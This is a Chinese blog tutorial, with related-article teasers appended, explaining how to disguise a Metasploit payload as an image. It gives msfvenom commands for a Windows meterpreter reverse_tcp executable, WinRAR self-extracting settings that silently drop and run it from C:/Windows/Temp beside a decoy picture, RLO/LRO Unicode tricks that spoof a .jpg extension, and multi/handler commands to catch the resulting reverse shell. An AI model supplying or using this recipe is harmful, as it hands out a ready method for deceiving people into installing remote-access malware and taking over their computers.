网络安全-解密WinRAR捆绑恶意程序并自动上线MSF的原理

since1986 发布于2021-11-16 11:39 / 2079人阅读

摘要：文章目录生成伪装恶意程序的封面图标捆绑恶意程序和图片并设置自动运行使用字符修改文件名后缀通过访问图片自动获取目标生成伪装恶意程序的封面图标需要安装压缩工具。转换后会自动下载捆绑恶意程序和图片并设置自动运行选中和添加到压缩文件。

文章目录

生成伪装恶意程序的封面图标
捆绑恶意程序和图片并设置自动运行
使用Unicode字符修改文件名后缀
通过访问图片自动获取目标shell

生成伪装恶意程序的封面图标

需要安装rar压缩工具。
WinRAR官网：http://www.winrar.com.cn/
下载安装即可不需要特殊配置。

msfvenom生成exe

┌──(root?xuegod53)-[~]└─# msfvenom  -p windows/meterpreter/reverse_tcp  LHOST=192.168.1.53 LPORT=4444 -f exe -o /var/www/html/dongman.exe

准备一张图片

图片生成ico图标用于恶意程序的封面图标：http://www.ico51.cn/
注：图片尺寸选最大的，也可以找一下其它的ico图标生成网站。

转换后会自动下载

捆绑恶意程序和图片并设置自动运行

选中dongman.exe和dongman.jpg添加到压缩文件。

勾选：创建自解压格式压缩文件

设置自解压选项

解压路径：C:/Windows/Temp
注：dongman.exe和dongman.jpg会被解压到C:/Windows/Temp

解压后运行dongman.exe和dongman.jpg
C:/Windows/Temp/dongman.jpg
C:/Windows/Temp/dongman.exe

静默方式解压

更新方式
多次解压可能会出现文件已经存在的情况，如果文件存在会询问用户。
建议选择覆盖所有文件或跳过已存在的文件。
覆盖：缺点是如果exe程序已经运行那么覆盖会失败。
跳过：如果exe文件的参数有修改跳过后则运行的还是旧版本。
建议：每次制作不要用相同的名字。

添加刚才生成的ico图标。

生成后的自解压文件。

使用Unicode字符修改文件名后缀

重命名

选中文件名鼠标右键插入RLO
RLO从右到左
LRO从左到右

插入gpj，RLO是从右到左，所以最终gpj=jpg

此时文件名后缀为exe.jpg，那这样还不理想，文件名部分是exe还是没什么意义

添加文件名
重命名，在exe前面插入Unicode控制字符LRO

输入文件名：动漫gpj.exe‬‬‬‬‬‬

最终效果，文件有ico图标伪装图片的缩略图，文件名后缀.jpg来伪装文件类型。
注：exe.不可以去掉

通过访问图片自动获取目标shell

┌──(root?xuegod53)-[~]└─# msfdb run     msf5 > use exploit/multi/handlermsf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcpmsf5 exploit(multi/handler) > set LHOST 192.168.1.53msf5 exploit(multi/handler) > set LPORT 4444msf6 exploit(multi/handler) > run

打开动漫gpj.exe

图片文件自动打开

MSF成功上线

临时目录下文件也都存在。
C:/Windows/Temp

更多技术干货请关注公众号【学神来啦】！

想要获取视频教程的请联系我们的小姐姐

idc机房托管混合云小程序的开发原理 php混淆解密原理 linux自动备份数据并邮件小程序上线时间

文章版权归作者所有，未经允许请勿转载,若此文章存在违规行为，您可以联系管理员删除。

转载请注明本文地址：https://www.ucloud.cn/yun/123427.html

[系统安全] 三十五.Procmon工具基本用法及文件进程、注册表查看

摘要：本文将分享软件基本用法及文件进程注册表查看，这是一款微软推荐的系统监视工具，功能非常强大可用来检测恶意软件。可以帮助使用者对系统中的任何文件注册表操作进行监视和记录，通过注册表和文件读写的变化，有效帮助诊断系统故障或发现恶意软件病毒及木马。 ...

kk_miles 2021-09-02 15:11 评论0 收藏0
渗透实战：内网域渗透

摘要：前言本文记录了一次针对具有二层内网的域环境进行渗透测试的过程，文中涉及了内网域渗透的基本方法思路和技巧。下面用来进行文件上传上传一个的木马然后在用高权限来运行木马成功上线抓取下密码至此，数据库服务器渗透结束，下面开始对域控的渗透。 ...

CastlePeaK 2021-11-24 09:38 评论0 收藏0
拥有300万安装量的应用是如何恶意推广刷榜的？

摘要：三刷榜僵尸分析应用是主包解密后植入到系统目录的应用，该应用是一款转用于恶意刷榜的病毒，利用用户设备账户信息作为刷榜僵尸，完成对控制端指定应用的恶意刷榜。作者：逆巴、如凌@阿里聚安全背景：随着移动端应用市场数量爆炸式增长，App推广和曝光率也越来越难。哪里有需求哪里就有生财之道，自然，App刷榜也就形成了一条产业链，它能够在短期内大幅提高下载量和用户量，进而提高应用的曝光率。近期...

zhonghanwen 2019-06-21 16:28 评论0 收藏0
渗透测试常见面试题总结

摘要：渗透攻击渗透攻击是指有攻击者或渗透测试者利用一个系统应用或服务中的安全漏洞，所进行的攻击行为。是指在渗透攻击时作为攻击载荷运行的一组机器指令。域将网络中多台计算机逻辑上组织到一起，进行集中管理，这种区别于工作组的逻辑环境叫做域，域是组织与存储资源的核心管理单元，在域中，至少有一台域控制器...

不知名网友 2021-11-26 11:11 评论0 收藏0
常用软件WinRAR中现新安全漏洞可致攻击者入侵网络修改数据

摘要：软件安全漏洞为企业及个人带来意想不到的网络攻击，这些潜伏在软件中的漏洞为黑客提供了破坏网络及数据的捷径。数据显示，以上的网络安全事件是由软件自身安全漏洞被利用导致的，可以说，不安全的软件大大提高了网络系统遭到攻击的风险。研究人员指出，WinRAR的调查是在观察到MSHTML(又名Trident)呈现的一个JavaScript错误后开始的。MSHTML是一种专为现已停止使用的ie开发的...

idealcn 2021-10-26 09:50 评论0 收藏0